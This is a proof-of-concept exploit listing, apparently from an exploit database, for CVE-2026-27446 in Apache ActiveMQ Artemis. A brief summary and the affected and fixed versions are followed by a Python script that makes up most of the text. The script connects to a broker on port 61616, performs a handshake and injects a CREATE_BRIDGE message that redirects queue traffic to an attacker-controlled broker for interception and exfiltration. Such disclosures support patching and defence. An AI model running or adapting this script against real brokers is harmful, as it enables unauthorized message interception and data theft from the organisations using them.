Share
## https://sploitus.com/exploit?id=PACKETSTORM:216666
=============================================================================================================================================
    | # Title     : Apache ActiveMQ Artemis Unauthorized Bridge Injection via Core Protocol                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://artemis.apache.org/components/artemis/                                                                              |
    =============================================================================================================================================
    
    [+] Summary    : PoC CVE-2026-27446 targeting the Core protocol of Apache ActiveMQ Artemis on its default port 61616.
    
    The code:
    
    Establishes a raw TCP connection to the target broker.
    
    Sends a minimal ARTEMIS handshake to verify Core protocol support.
    
    Attempts to inject a simplified CREATE_BRIDGE control message that redirects traffic to a rogue broker.
    
    If the broker is misconfigured (e.g., security disabled or management permissions improperly restricted), an attacker could potentially create a bridge without authentication, resulting in:
    
    Message interception
    
    Traffic redirection
    
    Data exfiltration
    
    Broker trust abuse
    
    [+] Affected Versions
    
    Apache Artemis: 2.50.0 โ†’ 2.51.0
    
    Apache ActiveMQ Artemis: 2.11.0 โ†’ 2.44.0
    
    [+] Fixed in: Apache Artemis 2.52.0
    			  
    [+] POC   :  
    
    import socket
    import struct
    
    TARGET_IP = "192.168.1.100"  
    TARGET_PORT = 61616           
    ATTACKER_IP = "192.168.1.50"  
    
    def create_core_packet(payload):
        """Wraps the data in the Core protocol format (Length + Data)"""
        return struct.pack('>I', len(payload)) + payload
    
    def check_vulnerability():
        try:
            print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((TARGET_IP, TARGET_PORT))
            handshake = b"ARTEMIS" + struct.pack('>I', 1) 
            sock.send(handshake)
            
            response = sock.recv(1024)
            if b"ARTEMIS" not in response:
                print("[-] Target does not seem to support Artemis Core protocol.")
                return
    
            print("[+] Handshake successful. Target supports Core protocol.")        
            print(f"[*] Sending malicious Bridge redirection to {ATTACKER_IP}...")
            evil_payload = f"CREATE_BRIDGE;name=exploit;uri=tcp://{ATTACKER_IP}:61616;queue=ANY".encode()
            sock.send(create_core_packet(evil_payload))
    
            print("[!] Packet sent. Monitor your rogue broker for incoming connections.")
            
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            sock.close()
    
    if __name__ == "__main__":
        check_vulnerability()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================